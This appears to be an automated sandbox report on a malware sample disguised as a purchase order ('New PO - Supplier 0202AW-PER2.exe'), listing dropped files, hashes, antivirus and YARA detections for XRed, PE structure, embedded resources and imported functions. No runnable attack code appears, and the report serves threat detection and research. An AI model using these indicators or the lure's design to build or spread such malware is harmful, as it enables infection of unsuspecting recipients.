                                                                                                                                SSDEEP:24576:ahloDX0XOf4+0kRKqh1XZWJFCc7j79nhF8R:ahloJfKoKqh1X+T9f8
                                                                                                                                MD5:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                SHA1:BE8784D03A832AADDFDCD53A0D337FBFBF100EE6
                                                                                                                                SHA-256:0B9A5D51C56644ECD7A0B0B9F31533DA83D1D16D6FD2DB55BBCDA7B095CA8FDB
                                                                                                                                SHA-512:29616B472141370252C58C827D733864A119FE87590AA3F2E41AC61CAD18BC717DE9AFCADEBFC4BFC0171EE54BC8126EFCEDD119AEA67E260795D187F4BC2C87
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....[jg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):913408
                                                                                                                                Entropy (8bit):7.877743429478407
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:ahloDX0XOf4+0kRKqh1XZWJFCc7j79nhF8R:ahloJfKoKqh1X+T9f8
                                                                                                                                MD5:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                SHA1:BE8784D03A832AADDFDCD53A0D337FBFBF100EE6
                                                                                                                                SHA-256:0B9A5D51C56644ECD7A0B0B9F31533DA83D1D16D6FD2DB55BBCDA7B095CA8FDB
                                                                                                                                SHA-512:29616B472141370252C58C827D733864A119FE87590AA3F2E41AC61CAD18BC717DE9AFCADEBFC4BFC0171EE54BC8126EFCEDD119AEA67E260795D187F4BC2C87
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....[jg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                C:\Users\user\Documents\KATAXZVCPS.xlsm

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18387
                                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                Malicious:false
                                                                                                                                Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                C:\Users\user\Documents\~$KATAXZVCPS.xlsx

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):165
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                C:\Users\user\Documents\~$cache1

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):771584
                                                                                                                                Entropy (8bit):6.6311521779536164
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+mr:ansJ39LyjbJkQFMhmC+6GD9f6
                                                                                                                                MD5:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                SHA1:C342E26972C1EE78B8409998386E0212234F6B80
                                                                                                                                SHA-256:12C8A50563F8B33F2613CA55AEE26FBE5473D68593D8E10E13C4D44D258B4E2A
                                                                                                                                SHA-512:B6FEB72243722ABE8F7E35784ABC386D9373BD652722334A1E2FB5B614CD857E1EB8A44C7593D2C1AB347C490E63371D3AB5FA4698D3BF3A63EC88A897A7440C
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1835008
                                                                                                                                Entropy (8bit):4.465648395439585
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:GIXfpi67eLPU9skLmb0b4pWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:rXD94pWlLZMM6YFHf+8
                                                                                                                                MD5:19279408D4D15E3E28170FC197102485
                                                                                                                                SHA1:BEC5D96F581EE7E7DB8D274F844C373AF35ED895
                                                                                                                                SHA-256:FBC88BC1D2599309F74C506CEBEF032E760A629BC125B5AE8D6DE545610D5E96
                                                                                                                                SHA-512:38037D1B250E85319D966064AC6B2383D8588F4D286222B4E35D767B4D39FE1F2C0391F4566C93DAE05BF29B56E57691B3ECA9DB7DAAEEC9160599F2A2D073D1
                                                                                                                                Malicious:false
                                                                                                                                Preview:regf8...8....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"Y.R(V.................................................................................................................................................................................................................................................................................................................................................f........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.4649180860888515
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                                • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                                • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                File name:New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File size:1'684'992 bytes
                                                                                                                                MD5:17fb4f9df5175e684a3427c5997b2007
                                                                                                                                SHA1:c7b207497e0171fbb8fca648d82753abbf42b0b8
                                                                                                                                SHA256:8f66247597f18a7b3f20dbdf2d29330f716222bd500a7a95642137e84fa3b3d3
                                                                                                                                SHA512:ed454b9588ab5209a926395c03b7e1ee35231bb77f66895187ebe86a3e94fc3568a247983946021887def3e4f396705142134abfdeb857b9e040dd863fe6d51d
                                                                                                                                SSDEEP:49152:gnsHyjtk2MYC5GDGfhloJfKoKqh1X+T9f8z:gnsmtk2aNfhlHoKqzX+Sz
                                                                                                                                TLSH:5475D032F2D18877D1331A399C6B93A4542ABE512D38794E3BE93E4D5F3A34238652D3
                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:0fd88dc89ea7861b

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x49ab80
                                                                                                                                Entrypoint Section:CODE
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                DLL Characteristics:
                                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                mov eax, 0049A778h
                                                                                                                                call 00007F9210C01B5Dh
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                call 00007F9210C554A5h
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                mov edx, 0049ABE0h
                                                                                                                                call 00007F9210C550A4h
                                                                                                                                mov ecx, dword ptr [0049DBDCh]
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                mov edx, dword ptr [00496590h]
                                                                                                                                call 00007F9210C55494h
                                                                                                                                mov eax, dword ptr [0049DBCCh]
                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                call 00007F9210C55508h
                                                                                                                                call 00007F9210BFF63Bh
                                                                                                                                add byte ptr [eax], al

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000xf0d30.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0xb00000xf0d300xf0e00ce772b0dddbf59f827d11ea4d655154cFalse0.8987446078749352data7.78380068008817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                                RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                                RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                                RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                                RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                                RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                                RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                                RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                                RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                                RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                                RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                                RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                                RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.24179174484052532
                                                                                                                                RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                                RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                                RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                                RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                                RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                                RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                                RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                                RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                                RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                                RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                                RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                                RT_STRING0xb67b80xdcdata0.6
                                                                                                                                RT_STRING0xb68940x320data0.45125
                                                                                                                                RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                                RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                                RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                                RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                                RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                                RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                                RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                                RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                                RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                                RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                                RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                                RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                                RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                                RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                                RT_RCDATA0xb8e040x10data1.5
                                                                                                                                RT_RCDATA0xb8e140xdf000PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.931114025714686
                                                                                                                                RT_RCDATA0x197e140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                                RT_RCDATA0x197e180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                                RT_RCDATA0x19ba180x64cdata0.5998759305210918
                                                                                                                                RT_RCDATA0x19c0640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                                RT_RCDATA0x19c1b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                                RT_GROUP_CURSOR0x1a098c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                RT_GROUP_CURSOR0x1a09a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                RT_GROUP_CURSOR0x1a09b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                RT_GROUP_CURSOR0x1a09c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                RT_GROUP_CURSOR0x1a09dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                RT_GROUP_CURSOR0x1a09f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                RT_GROUP_CURSOR0x1a0a040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                RT_GROUP_ICON0x1a0a180x14dataTurkishTurkey1.1
                                                                                                                                RT_VERSION0x1a0a2c0x304dataTurkishTurkey0.42875647668393785

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                                kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                ole32.dllCLSIDFromString
                                                                                                                                kernel32.dllSleep
                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                oleaut32.dllGetErrorInfo, SysFreeString
